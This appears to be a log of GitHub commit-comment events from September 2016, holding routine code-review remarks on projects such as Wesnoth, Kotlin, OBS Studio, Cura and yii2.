{"id":"4532472166","type":"CommitCommentEvent","actor":{"login":"jyrkive"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18941038,"position":5,"line":38,"path":"src/gui/dialogs/dialog.cpp","commit_id":"da437f74ca9c23625369b45ce208691c2fc8a685","created_at":"2016-09-08T08:13:22Z","updated_at":"2016-09-08T08:13:22Z","body":"Disabling `allow_plugin_skip_` also disables the early return when the game is launched with `--nogui`. I expect all kinds of breakage in automatic MP tests."}},"created_at":"2016-09-08T08:13:22Z"}
{"id":"4532472390","type":"CommitCommentEvent","actor":{"login":"terrelln"},"repo":{"name":"terrelln/file"},"payload":{"comment":{"id":18941039,"position":54,"line":273,"path":"magic/Magdir/compress","commit_id":"b1c9fb1e6cc76ba7a22098b88adab97257aa5394","created_at":"2016-09-08T08:13:25Z","updated_at":"2016-09-08T08:13:25Z","body":"As far as I can tell, the magic language only allows you to manipulate offsets with `*/+-%`, not values.  And even then, you are only allowed to do one operation.  There may be a trick I'm missing to calculate the window size, but the only way I can see is to have 256 lines and just brute force the calculation.\r\n\r\nThe content size is definitely doable."}},"created_at":"2016-09-08T08:13:25Z"}
{"id":"4532476672","type":"CommitCommentEvent","actor":{"login":"SuslikV"},"repo":{"name":"jp9000/obs-studio"},"payload":{"comment":{"id":18941044,"position":null,"line":null,"path":null,"commit_id":"39592ff5ebb9aa641ae460b7c044e3fc1cc0196f","created_at":"2016-09-08T08:14:24Z","updated_at":"2016-09-08T08:14:24Z","body":"I hope, this is for API test only. Otherwise it's waste of time, imho. Absolutely Unnecessary Thing in OBS Studio."}},"created_at":"2016-09-08T08:14:24Z"}
{"id":"4532478221","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18941046,"position":4,"line":31,"path":"core/descriptors/src/org/jetbrains/kotlin/resolve/scopes/MemberScope.kt","commit_id":"e3f1a55a19b697e92df72c32ea258454e7f7f547","created_at":"2016-09-08T08:14:46Z","updated_at":"2016-09-08T08:14:46Z","body":"I think it should be documented that it's fine to return a superset of the actual set of names"}},"created_at":"2016-09-08T08:14:46Z"}
{"id":"4532479872","type":"CommitCommentEvent","actor":{"login":"clash0909"},"repo":{"name":"clash0909/Catchem-PoGo"},"payload":{"comment":{"id":18941052,"position":2,"line":1,"path":"latest.version","commit_id":"1aa326148e1e91aa8c1e013c5c3ecaec11cb42b2","created_at":"2016-09-08T08:15:11Z","updated_at":"2016-09-08T08:15:11Z","body":"ถ้าหากเข้าสู่ระบบและมีโปเก มอนแม็กซ์และ U มี spow ของโปเกมอนบอไม่หาทางออกและ ไปในวง จำกัด นี้ : 20.27.54 Pokemon สินค้าคงคลังเต็มโอนโปเกมอน ... 20.29.59ตัวละครเป็นยุ่ง มากคุณอาจจะพยายามที่จะทำ 2 หรือมากกว่าการกระทำในเวลาเดียวกัน! โปรดลองใหม่ในภายหลัง! ถ้าคุณไม่ได้ทำอะไร - ละเว้นข้อความนั้นและไม่ได้ส่งปัญหา Git!\r\n\r\n\r\nสำหรับข้อผิดพลาดการตอบกลับเข้าสู่ระบบด้วยสินค้าคงคลังโปเ​​กมอนเต็มรูปแบบและมี spow โปเกมอน``"}},"created_at":"2016-09-08T08:15:11Z"}
{"id":"4532480081","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":18941054,"position":null,"line":null,"path":null,"commit_id":"8b6b4f59204b17b1d58b3d020a7cce617c163a85","created_at":"2016-09-08T08:15:14Z","updated_at":"2016-09-08T08:15:14Z","body":"Hi Ray,\r\nI just committed your code for this into the codebase. Simply beautiful work. With the login page and the tabs layout(set this as default setting), I almost don't even recognize OpenEMR anymore :)\r\nthanks,\r\n-brady"}},"created_at":"2016-09-08T08:15:14Z"}
{"id":"4532480540","type":"CommitCommentEvent","actor":{"login":"onli"},"repo":{"name":"s9y/additional_plugins"},"payload":{"comment":{"id":18941056,"position":null,"line":null,"path":null,"commit_id":"ba0e8d93ba9ca3197b0b260835d5110c47f85e60","created_at":"2016-09-08T08:15:21Z","updated_at":"2016-09-08T08:15:21Z","body":"Good idea, yes."}},"created_at":"2016-09-08T08:15:21Z"}
{"id":"4532481996","type":"CommitCommentEvent","actor":{"login":"jordwalke"},"repo":{"name":"bsansouci/reason"},"payload":{"comment":{"id":18941059,"position":31,"line":3031,"path":"src/reason_pprint_ast.ml","commit_id":"11b83517d39a886f2a8036e94680ca0a836433c0","created_at":"2016-09-08T08:15:39Z","updated_at":"2016-09-08T08:15:39Z","body":"Yeah, this looks right."}},"created_at":"2016-09-08T08:15:39Z"}
{"id":"4532485684","type":"CommitCommentEvent","actor":{"login":"2001db8"},"repo":{"name":"schoerg/yowsup"},"payload":{"comment":{"id":18941067,"position":null,"line":null,"path":null,"commit_id":"42261bf5aaa09db195d02e363c8eb1c6070822ca","created_at":"2016-09-08T08:16:28Z","updated_at":"2016-09-08T08:16:28Z","body":"Thanks! Fixed the old_version error I was getting with the current master."}},"created_at":"2016-09-08T08:16:28Z"}
{"id":"4532493691","type":"CommitCommentEvent","actor":{"login":"jordwalke"},"repo":{"name":"bsansouci/reason"},"payload":{"comment":{"id":18941089,"position":29,"line":3029,"path":"src/reason_pprint_ast.ml","commit_id":"11b83517d39a886f2a8036e94680ca0a836433c0","created_at":"2016-09-08T08:18:20Z","updated_at":"2016-09-08T08:18:20Z","body":"The indentation looks a little off. If only we had a pretty printer that deterministically formats all our source including line wrappings!\r\n\r\nUntil then, could  you write it as:\r\n\r\n```ocaml\r\nlet rightItm = (\r\n  match rightExpr.pexp_desc with\r\n  | Pexp_apply ... -> (\r\n    match ...\r\n    | ... \r\n  )\r\n)\r\n```"}},"created_at":"2016-09-08T08:18:20Z"}
{"id":"4532493830","type":"CommitCommentEvent","actor":{"login":"JM0425"},"repo":{"name":"JM0425/ChatBaseOnXmpp"},"payload":{"comment":{"id":18941090,"position":null,"line":null,"path":null,"commit_id":"dfd4379897522ca783bd2aa1f223d6e847ed1491","created_at":"2016-09-08T08:18:22Z","updated_at":"2016-09-08T08:18:22Z","body":"没有评论"}},"created_at":"2016-09-08T08:18:22Z"}
{"id":"4532495929","type":"CommitCommentEvent","actor":{"login":"jyrkive"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18941095,"position":4,"line":60,"path":"src/game_launcher.hpp","commit_id":"d0906ceac57c21edd380f41b28507dc6cf4ed18e","created_at":"2016-09-08T08:18:49Z","updated_at":"2016-09-08T08:18:49Z","body":"Thank you for replacing unnamed integer constants with an enum. :+1: "}},"created_at":"2016-09-08T08:18:49Z"}
{"id":"4532499295","type":"CommitCommentEvent","actor":{"login":"ksjogo"},"repo":{"name":"ksjogo/platformsh-typo3-template"},"payload":{"comment":{"id":18941104,"position":null,"line":null,"path":null,"commit_id":"73d8bc16061edbf19fca2f6e7ed4a5d5b53d616c","created_at":"2016-09-08T08:19:37Z","updated_at":"2016-09-08T08:19:37Z","body":"The compiling also changed on develop with the updated bootstrappackage."}},"created_at":"2016-09-08T08:19:37Z"}
{"id":"4532499898","type":"CommitCommentEvent","actor":{"login":"skywalkerlk"},"repo":{"name":"skywalkerlk/python_personal-snake"},"payload":{"comment":{"id":18941106,"position":null,"line":null,"path":null,"commit_id":"2c48a8600cea1e5293bf71470bd55156643ad958","created_at":"2016-09-08T08:19:46Z","updated_at":"2016-09-08T08:19:46Z","body":"\"snake用sprite改写，但是用list管理。因为SpriteGroup更类似于字典 ，一些内置方法也更接近字典的操作，不像list"}},"created_at":"2016-09-08T08:19:46Z"}
{"id":"4532505931","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18941125,"position":null,"line":null,"path":null,"commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-08T08:21:08Z","updated_at":"2016-09-08T08:21:08Z","body":"こちら、ご指摘ありがとうございます。\r\n「PDO SQLインジェクション」に関して再度調べてみました。\r\n1.文字エンコーディングを指定する\r\n2.静的プレースホルダを用いる\r\n3.バインド時に型を指定する\r\n元のコードはこちらの考えに従って書かれていた形ですね。\r\n私も再度書きなおしてプッシュしました。\r\n\r\n"}},"created_at":"2016-09-08T08:21:08Z"}
{"id":"4532507555","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18941129,"position":null,"line":null,"path":null,"commit_id":"21b0f5236d2741c1202fa4c9d98ec6d619d6414d","created_at":"2016-09-08T08:21:29Z","updated_at":"2016-09-08T08:21:29Z","body":"@snicolet, thats a good point about sliders. I'll try that when I get a chance. Thanks.\r\n"}},"created_at":"2016-09-08T08:21:29Z"}
{"id":"4532508020","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18941131,"position":5,"line":32,"path":"core/descriptors/src/org/jetbrains/kotlin/resolve/scopes/MemberScope.kt","commit_id":"e3f1a55a19b697e92df72c32ea258454e7f7f547","created_at":"2016-09-08T08:21:34Z","updated_at":"2016-09-08T08:21:34Z","body":"Maybe this should be named `getVariableNames` to be consistent with `getContributedVariables`"}},"created_at":"2016-09-08T08:21:34Z"}
{"id":"4532508244","type":"CommitCommentEvent","actor":{"login":"jordwalke"},"repo":{"name":"bsansouci/reason"},"payload":{"comment":{"id":18941132,"position":45,"line":45,"path":"formatTest/unit_tests/input/bucklescript.re","commit_id":"11b83517d39a886f2a8036e94680ca0a836433c0","created_at":"2016-09-08T08:21:37Z","updated_at":"2016-09-08T08:21:37Z","body":"I think we need a test cases where the thing to the left of the `##` is `(! x)` to make sure the parens are preserved (which is what your use of` simple_enough_to_be_lhs_dot_send` would do."}},"created_at":"2016-09-08T08:21:37Z"}
{"id":"4532508327","type":"CommitCommentEvent","actor":{"login":"yhu98"},"repo":{"name":"iOS-Connect/sc-ios-connect"},"payload":{"comment":{"id":18941133,"position":30,"line":30,"path":"InstagramPlan.md","commit_id":"919e79fa15235bbd34ea2f552605df6d7a2aa987","created_at":"2016-09-08T08:21:38Z","updated_at":"2016-09-08T08:21:38Z","body":"It's very easy to invite people to a firebase project, I second the motion to use one firebase database for the group project. "}},"created_at":"2016-09-08T08:21:38Z"}
{"id":"4532510737","type":"CommitCommentEvent","actor":{"login":"yhu98"},"repo":{"name":"iOS-Connect/sc-ios-connect"},"payload":{"comment":{"id":18941137,"position":24,"line":24,"path":"InstagramPlan.md","commit_id":"919e79fa15235bbd34ea2f552605df6d7a2aa987","created_at":"2016-09-08T08:22:14Z","updated_at":"2016-09-08T08:22:14Z","body":"I can download the SDK and have it on a USB stick"}},"created_at":"2016-09-08T08:22:14Z"}
{"id":"4532510885","type":"CommitCommentEvent","actor":{"login":"vomikan"},"repo":{"name":"moneymanagerex/moneymanagerex"},"payload":{"comment":{"id":18941138,"position":null,"line":null,"path":null,"commit_id":"b00f3b08df82fff329bdc7d46e51ec38de0e7274","created_at":"2016-09-08T08:22:15Z","updated_at":"2016-09-08T08:22:15Z","body":"Seems after that or previous commit next ones not working anymore\r\n![image](https://cloud.githubusercontent.com/assets/6836805/18342216/592f6116-75b6-11e6-9288-e95cd23c3084.png)\r\n"}},"created_at":"2016-09-08T08:22:15Z"}
{"id":"4532512329","type":"CommitCommentEvent","actor":{"login":"MaximeThoonsen"},"repo":{"name":"jowent/ansible-autopostgresqlbackup"},"payload":{"comment":{"id":18941142,"position":null,"line":null,"path":null,"commit_id":"e8dc80af76694b353e140d5dd825d12685c5a026","created_at":"2016-09-08T08:22:34Z","updated_at":"2016-09-08T08:22:34Z","body":"@djowett looks fine. Sorry I don't have much time to test it .. :/"}},"created_at":"2016-09-08T08:22:34Z"}
{"id":"4532513053","type":"CommitCommentEvent","actor":{"login":"SilverFire"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":18941143,"position":null,"line":null,"path":null,"commit_id":"03e5f1cc58e8dbd03479fa23412d3cb91397cfa3","created_at":"2016-09-08T08:22:43Z","updated_at":"2016-09-08T08:22:43Z","body":"Tests should fail?"}},"created_at":"2016-09-08T08:22:43Z"}
{"id":"4532514911","type":"CommitCommentEvent","actor":{"login":"yhu98"},"repo":{"name":"iOS-Connect/sc-ios-connect"},"payload":{"comment":{"id":18941154,"position":32,"line":32,"path":"InstagramPlan.md","commit_id":"919e79fa15235bbd34ea2f552605df6d7a2aa987","created_at":"2016-09-08T08:23:11Z","updated_at":"2016-09-08T08:23:11Z","body":"Maybe we can plan out week 3 and 4 after the first two weeks? Just in case that we don't make as much progress as we are expecting? "}},"created_at":"2016-09-08T08:23:11Z"}
{"id":"4532516936","type":"CommitCommentEvent","actor":{"login":"hao68hao"},"repo":{"name":"hao68hao/gitskills"},"payload":{"comment":{"id":18941159,"position":null,"line":null,"path":null,"commit_id":"64318e4a2fd0f4dda665d6aeb6b93298036ad8c8","created_at":"2016-09-08T08:23:35Z","updated_at":"2016-09-08T08:23:35Z","body":"im lihao"}},"created_at":"2016-09-08T08:23:35Z"}
{"id":"4532517781","type":"CommitCommentEvent","actor":{"login":"Mafii"},"repo":{"name":"IDPA-2016-NEAT-CNN/NEAT_Visualizer"},"payload":{"comment":{"id":18941164,"position":null,"line":null,"path":null,"commit_id":"5f9d351e3d61ed12ec6ac603cf655762cbb01f95","created_at":"2016-09-08T08:23:48Z","updated_at":"2016-09-08T08:23:48Z","body":"Postcompile-changes to IL don't seem to work with travis. I will have to figure it out."}},"created_at":"2016-09-08T08:23:48Z"}
{"id":"4532518110","type":"CommitCommentEvent","actor":{"login":"msangoi"},"repo":{"name":"eclipse/leshan"},"payload":{"comment":{"id":18941166,"position":86,"line":86,"path":"leshan-server-cf/src/main/java/org/eclipse/leshan/server/californium/impl/InMemoryLwM2mObservationStore.java","commit_id":"df29e7b361ee49422583af5386dff9cfd24cd7d1","created_at":"2016-09-08T08:23:52Z","updated_at":"2016-09-08T08:23:52Z","body":"Mmm you're right, I did this dev from this [californium branch](https://github.com/msangoi/californium/tree/request-context) which originally was not containing [this commit](https://github.com/eclipse/californium/commit/6ea06d6a908cf48e9d189b006294d2e3cb296acb) from Kai.\r\nThanks for pointing this out! It should be ok now."}},"created_at":"2016-09-08T08:23:52Z"}
{"id":"4532518952","type":"CommitCommentEvent","actor":{"login":"jackhftang"},"repo":{"name":"pyrsmk/qwest"},"payload":{"comment":{"id":18941169,"position":7,"line":5,"path":"src/qwest.js","commit_id":"45376855c8bd55d95f1220ad99d65d1c600fb418","created_at":"2016-09-08T08:24:04Z","updated_at":"2016-09-08T08:24:04Z","body":"self is not defined.. "}},"created_at":"2016-09-08T08:24:04Z"}
{"id":"4532519417","type":"CommitCommentEvent","actor":{"login":"thomas-mueller"},"repo":{"name":"cms-analysis/HiggsAnalysis-KITHiggsToTauTau"},"payload":{"comment":{"id":18941170,"position":null,"line":null,"path":null,"commit_id":"53cd28025f82bed9f55918ee2969175db3868416","created_at":"2016-09-08T08:24:12Z","updated_at":"2016-09-08T08:24:12Z","body":"This commit requires pulling in Kappa (and, as always, compiling Kappa with make)."}},"created_at":"2016-09-08T08:24:12Z"}
{"id":"4532522751","type":"CommitCommentEvent","actor":{"login":"WilliamBruneau"},"repo":{"name":"WilliamBruneau/miasm"},"payload":{"comment":{"id":18941179,"position":null,"line":null,"path":null,"commit_id":"1e0505ff8a19bb04c905c24a1a533a1f8f871b76","created_at":"2016-09-08T08:24:57Z","updated_at":"2016-09-08T08:24:57Z","body":"Failure case:\r\n\r\n- `self.cpu.get_segm_base(segm_nb)` returns the address 0x7FF70000.\r\n- `expr.size` equals 16 (because `expr.args[1].size` equals 16).\r\n- `m2_expr.ExprInt(segmaddr, expr.size)` will have the value 0x0000 instead of the expected value 0x7FF70000.\r\n\r\nFix:\r\n\r\n- We create the base address according to the address size of the architecture (`m2_expr.ExprInt(segmaddr, arch_size)`).\r\n- We have to modify the size of the offset according to the address size in order to create the `ExprOp` \"+\" correctly."}},"created_at":"2016-09-08T08:24:57Z"}
{"id":"4532523720","type":"CommitCommentEvent","actor":{"login":"chaudhuri"},"repo":{"name":"robblanco/abella"},"payload":{"comment":{"id":18941182,"position":null,"line":null,"path":null,"commit_id":"928bcb69bdc9066f489ff27be4b2580caf019258","created_at":"2016-09-08T08:25:13Z","updated_at":"2016-09-08T08:25:13Z","body":"Sounds good. Merging..."}},"created_at":"2016-09-08T08:25:13Z"}
{"id":"4532526312","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18941190,"position":null,"line":null,"path":null,"commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-08T08:25:43Z","updated_at":"2016-09-08T08:25:43Z","body":"try~ catchに関しては、下記が基本形かと思うのですが、\r\n\r\n![image](https://cloud.githubusercontent.com/assets/19584742/18342249/d045b476-75e8-11e6-96dc-6978097a3e33.png)\r\n\r\n\r\n実際にコードにthrowを入れるとエラーになってしまいます。こちらはどこに問題があるのでしょうか。\r\n\r\n![image](https://cloud.githubusercontent.com/assets/19584742/18342305/243f2490-75e9-11e6-998d-893135a323b7.png)\r\n\r\nこちらリポジトリにプッシュしましたので、一度見て頂けますでしょうか。\r\n"}},"created_at":"2016-09-08T08:25:43Z"}
{"id":"4532529641","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18941200,"position":8,"line":32,"path":"plugins/CuraProfileReader/CuraProfileReader.py","commit_id":"d7d18043196734ae98da57ea24033b34cd485765","created_at":"2016-09-08T08:26:26Z","updated_at":"2016-09-08T08:26:26Z","body":"Try this code:\r\n\r\n    import zipfile\r\n    with zipfile.ZipFile(\"/usr/bin/make\"):\r\n        pass\r\n\r\nThat gives this result for me:\r\n\r\n    Traceback (most recent call last):\r\n      File \"<stdin>\", line 1, in <module>\r\n      File \"/usr/lib/python3.4/zipfile.py\", line 937, in __init__\r\n        self._RealGetContents()\r\n      File \"/usr/lib/python3.4/zipfile.py\", line 978, in _RealGetContents\r\n        raise BadZipFile(\"File is not a zip file\")\r\n    zipfile.BadZipFile: File is not a zip file\r\n\r\nAnyway, this was changed later by @sedwards2009 in a follow-up commit to catch only `BadZipFile`. I wonder whether it'd be good to catch `LargeZipFile` also, but we probably wouldn't encounter that with profiles (unless we have literally billions of settings!)."}},"created_at":"2016-09-08T08:26:26Z"}
{"id":"4532534073","type":"CommitCommentEvent","actor":{"login":"CarzyCode"},"repo":{"name":"CarzyCode/Carzy"},"payload":{"comment":{"id":18941206,"position":null,"line":null,"path":null,"commit_id":"1e87ac471b18ad2fc4811db0fa5354baaf79ea40","created_at":"2016-09-08T08:27:24Z","updated_at":"2016-09-08T08:27:24Z","body":"赠予小涵同学"}},"created_at":"2016-09-08T08:27:24Z"}
{"id":"4532534742","type":"CommitCommentEvent","actor":{"login":"Wryyyy"},"repo":{"name":"Wryyyy/python-random-scripts"},"payload":{"comment":{"id":18941207,"position":null,"line":null,"path":null,"commit_id":"04ac91a6b3cef7a6e944a4bf9f2b8e7f5cb8cd0d","created_at":"2016-09-08T08:27:33Z","updated_at":"2016-09-08T08:27:33Z","body":"Search X word from all the TXT files from X directory"}},"created_at":"2016-09-08T08:27:33Z"}
{"id":"4532536488","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":18941213,"position":null,"line":null,"path":null,"commit_id":"f619f7657547a512c412bab0b4f41826568dca4c","created_at":"2016-09-08T08:27:54Z","updated_at":"2016-09-08T08:27:54Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=1)"}},"created_at":"2016-09-08T08:27:54Z"}
{"id":"4532537379","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18941218,"position":null,"line":null,"path":null,"commit_id":"fe65ba628f2d6a84d469450cfd3265ef7b0b957b","created_at":"2016-09-08T08:28:06Z","updated_at":"2016-09-08T08:28:06Z","body":"Local test: Score of formula vs base: 145 - 126 - 400  [0.514] 671 ELO difference: 9.84 +/- 16.69 STC"}},"created_at":"2016-09-08T08:28:06Z"}
{"id":"4532540343","type":"CommitCommentEvent","actor":{"login":"tkrokli"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18941226,"position":null,"line":null,"path":null,"commit_id":"19e757af5cb6bbde3f9263f0f4aaec87a7e0301c","created_at":"2016-09-08T08:28:42Z","updated_at":"2016-09-08T08:28:42Z","body":"Please open a new issue about it, with all the info asked for by the issue template.\r\nIt is better to troubleshoot an issue than a statement in a commit.\r\n(I suppose it is OK to comment about it here too, though.)"}},"created_at":"2016-09-08T08:28:42Z"}
{"id":"4532543988","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18941240,"position":null,"line":null,"path":null,"commit_id":"4f22132686072dc6a007fa000d34540135078eeb","created_at":"2016-09-08T08:29:30Z","updated_at":"2016-09-08T08:29:30Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#fZUJ-HKdT_CEvdobIs0C9w"}},"created_at":"2016-09-08T08:29:30Z"}
{"id":"4532544141","type":"CommitCommentEvent","actor":{"login":"stzanakis"},"repo":{"name":"europeana/Europeana-Cloud"},"payload":{"comment":{"id":18941241,"position":13,"line":42,"path":"docker/cassandra/mcs_setup.cql","commit_id":"08505a8a0c07734be11de7d4492e84cb5e47ae1f","created_at":"2016-09-08T08:29:32Z","updated_at":"2016-09-08T08:29:32Z","body":"Why did you change the ordering here?"}},"created_at":"2016-09-08T08:29:32Z"}
{"id":"4532544256","type":"CommitCommentEvent","actor":{"login":"caohhung"},"repo":{"name":"scattm/DanceCat"},"payload":{"comment":{"id":18941242,"position":5,"line":112,"path":"DanceCat/Helpers.py","commit_id":"ce28e4e27a52d11d6881e1b477d67ed23bd4c5c1","created_at":"2016-09-08T08:29:33Z","updated_at":"2016-09-08T08:29:33Z","body":"if isinstance(raw, (str, unicode)):"}},"created_at":"2016-09-08T08:29:33Z"}
{"id":"4532546858","type":"CommitCommentEvent","actor":{"login":"stzanakis"},"repo":{"name":"europeana/Europeana-Cloud"},"payload":{"comment":{"id":18941252,"position":8,"line":38,"path":"docker/cassandra/mcs_setup.cql","commit_id":"08505a8a0c07734be11de7d4492e84cb5e47ae1f","created_at":"2016-09-08T08:30:10Z","updated_at":"2016-09-08T08:30:10Z","body":"Why revert the previous and use the concatenation?"}},"created_at":"2016-09-08T08:30:10Z"}
{"id":"4532549255","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18941257,"position":18,"line":136,"path":"core/descriptor.loader.java/src/org/jetbrains/kotlin/load/kotlin/JvmBuiltInsSettings.kt","commit_id":"ca5688b15fc8084950d97dc0bbeef245739eb5b4","created_at":"2016-09-08T08:30:40Z","updated_at":"2016-09-08T08:30:40Z","body":"\"would look\""}},"created_at":"2016-09-08T08:30:40Z"}
{"id":"4532553952","type":"CommitCommentEvent","actor":{"login":"cebe"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":18941264,"position":null,"line":null,"path":null,"commit_id":"03e5f1cc58e8dbd03479fa23412d3cb91397cfa3","created_at":"2016-09-08T08:31:38Z","updated_at":"2016-09-08T08:31:38Z","body":"they currently do not because of a change I made but imo the asserted behavior is not the expected behavior in all cases. we need to find all use cases of this method and define a constant behavior, this commit is a trial of me doing that but far from complete."}},"created_at":"2016-09-08T08:31:38Z"}
{"id":"4532561302","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18941281,"position":140,"line":128,"path":"otrv4.md","commit_id":"4c94da9242a80ca74c7cc5aec78a58bdd734682c","created_at":"2016-09-08T08:33:14Z","updated_at":"2016-09-08T08:33:14Z","body":"Absolutely not. The math should be all simple text. We should not have enough math in the protocol description for that to matter."}},"created_at":"2016-09-08T08:33:14Z"}
{"id":"4532561982","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"MSF-Jarvis/KPSConnect"},"payload":{"comment":{"id":18941283,"position":null,"line":null,"path":null,"commit_id":"a046646f5b6cd9e8409fcaf2bf20592da483b546","created_at":"2016-09-08T08:33:22Z","updated_at":"2016-09-08T08:33:22Z","body":"spaghetti bolognese? :spaghetti: "}},"created_at":"2016-09-08T08:33:22Z"}
{"id":"4532564176","type":"CommitCommentEvent","actor":{"login":"OsirisNL"},"repo":{"name":"jp9000/obs-studio"},"payload":{"comment":{"id":18941288,"position":null,"line":null,"path":null,"commit_id":"39592ff5ebb9aa641ae460b7c044e3fc1cc0196f","created_at":"2016-09-08T08:33:50Z","updated_at":"2016-09-08T08:33:50Z","body":"Why?"}},"created_at":"2016-09-08T08:33:50Z"}
{"id":"4532564241","type":"CommitCommentEvent","actor":{"login":"zhangnaifan"},"repo":{"name":"zhangnaifan/HelloWorld"},"payload":{"comment":{"id":18941289,"position":null,"line":null,"path":null,"commit_id":"e6d1d2385722fa6df1976a9d4745bb072a685369","created_at":"2016-09-08T08:33:51Z","updated_at":"2016-09-08T08:33:51Z","body":"good job!"}},"created_at":"2016-09-08T08:33:51Z"}
{"id":"4532565353","type":"CommitCommentEvent","actor":{"login":"bluta"},"repo":{"name":"heroku/heroku"},"payload":{"comment":{"id":18941294,"position":null,"line":null,"path":null,"commit_id":"9f5fb2260c16895e22c4687009548f3404b51200","created_at":"2016-09-08T08:34:06Z","updated_at":"2016-09-08T08:34:06Z","body":"@ransombriggs it seems we at least have a version we can use ;) . Anything you can share about what failed - so we might have the chance to help fixing? cc @balaszlaszlo"}},"created_at":"2016-09-08T08:34:06Z"}
{"id":"4532565430","type":"CommitCommentEvent","actor":{"login":"FireFart"},"repo":{"name":"wpscanteam/wpscan"},"payload":{"comment":{"id":18941296,"position":null,"line":null,"path":null,"commit_id":"f3cc35bd74cf5d91774fd0bcafda8e6f8d849c98","created_at":"2016-09-08T08:34:07Z","updated_at":"2016-09-08T08:34:07Z","body":"@ethicalhack3r don't forget to update the license file on wpvulndb too (static files)"}},"created_at":"2016-09-08T08:34:07Z"}
{"id":"4532569025","type":"CommitCommentEvent","actor":{"login":"Gol-D-Ace"},"repo":{"name":"jp9000/obs-studio"},"payload":{"comment":{"id":18941311,"position":null,"line":null,"path":null,"commit_id":"39592ff5ebb9aa641ae460b7c044e3fc1cc0196f","created_at":"2016-09-08T08:34:50Z","updated_at":"2016-09-08T08:34:50Z","body":"It's not. Especially helpful for all the multi executable games like for example League of Legends. Also this feature is in OBS Classic."}},"created_at":"2016-09-08T08:34:50Z"}
{"id":"4532572321","type":"CommitCommentEvent","actor":{"login":"vomikan"},"repo":{"name":"moneymanagerex/moneymanagerex"},"payload":{"comment":{"id":18941321,"position":null,"line":null,"path":null,"commit_id":"0cc2210bc0e6d5e23ea67ca034223b30f7da1877","created_at":"2016-09-08T08:35:32Z","updated_at":"2016-09-08T08:35:32Z","body":"C:\\projects\\moneymanagerex\\mmex_release\\mmex_{env:appveyor_repo_tag_name}_Win32_portable\\ : The system cannot find the path specified.\r\n----------------\r\nScan WARNINGS: 1\r\nCommand exited with code 1"}},"created_at":"2016-09-08T08:35:32Z"}
{"id":"4532573273","type":"CommitCommentEvent","actor":{"login":"paphonbth"},"repo":{"name":"boswelja/AndroidN-ify"},"payload":{"comment":{"id":18941324,"position":null,"line":null,"path":null,"commit_id":"76769d177689ee0b4d2f1988b41355e26b72aa92","created_at":"2016-09-08T08:35:45Z","updated_at":"2016-09-08T08:35:45Z","body":"So... You figured out a way to use the one from CM?"}},"created_at":"2016-09-08T08:35:45Z"}
{"id":"4532578694","type":"CommitCommentEvent","actor":{"login":"sedwards2009"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18941340,"position":6,"line":30,"path":"plugins/CuraProfileReader/CuraProfileReader.py","commit_id":"d7d18043196734ae98da57ea24033b34cd485765","created_at":"2016-09-08T08:36:53Z","updated_at":"2016-09-08T08:36:53Z","body":"We should close it. GC will close it sometime in the future. When that happens is not defined in the Python language though. (CPython will close it real quick though. reference counting) The danger on Windows at least is that if that file is open then it __may__ block other processes and Cura itself from writing to or reading from it. Leading to really annoying vague bugs.\r\n"}},"created_at":"2016-09-08T08:36:53Z"}
{"id":"4532580187","type":"CommitCommentEvent","actor":{"login":"boswelja"},"repo":{"name":"boswelja/AndroidN-ify"},"payload":{"comment":{"id":18941344,"position":null,"line":null,"path":null,"commit_id":"76769d177689ee0b4d2f1988b41355e26b72aa92","created_at":"2016-09-08T08:37:13Z","updated_at":"2016-09-08T08:37:13Z","body":"Still working on that @paphonbth "}},"created_at":"2016-09-08T08:37:13Z"}
{"id":"4532582497","type":"CommitCommentEvent","actor":{"login":"lhuygi"},"repo":{"name":"HuygensING/langident"},"payload":{"comment":{"id":18941350,"position":4,"line":4,"path":"src/main/java/nl/knaw/huygens/pergamon/nlp/langident/health/ModelHealthCheck.java","commit_id":"cbd5dee88f95f55e28c5b3e4d807826197e0028d","created_at":"2016-09-08T08:37:42Z","updated_at":"2016-09-08T08:37:42Z","body":"Dropwizard demands we use Guava's Optional here."}},"created_at":"2016-09-08T08:37:42Z"}
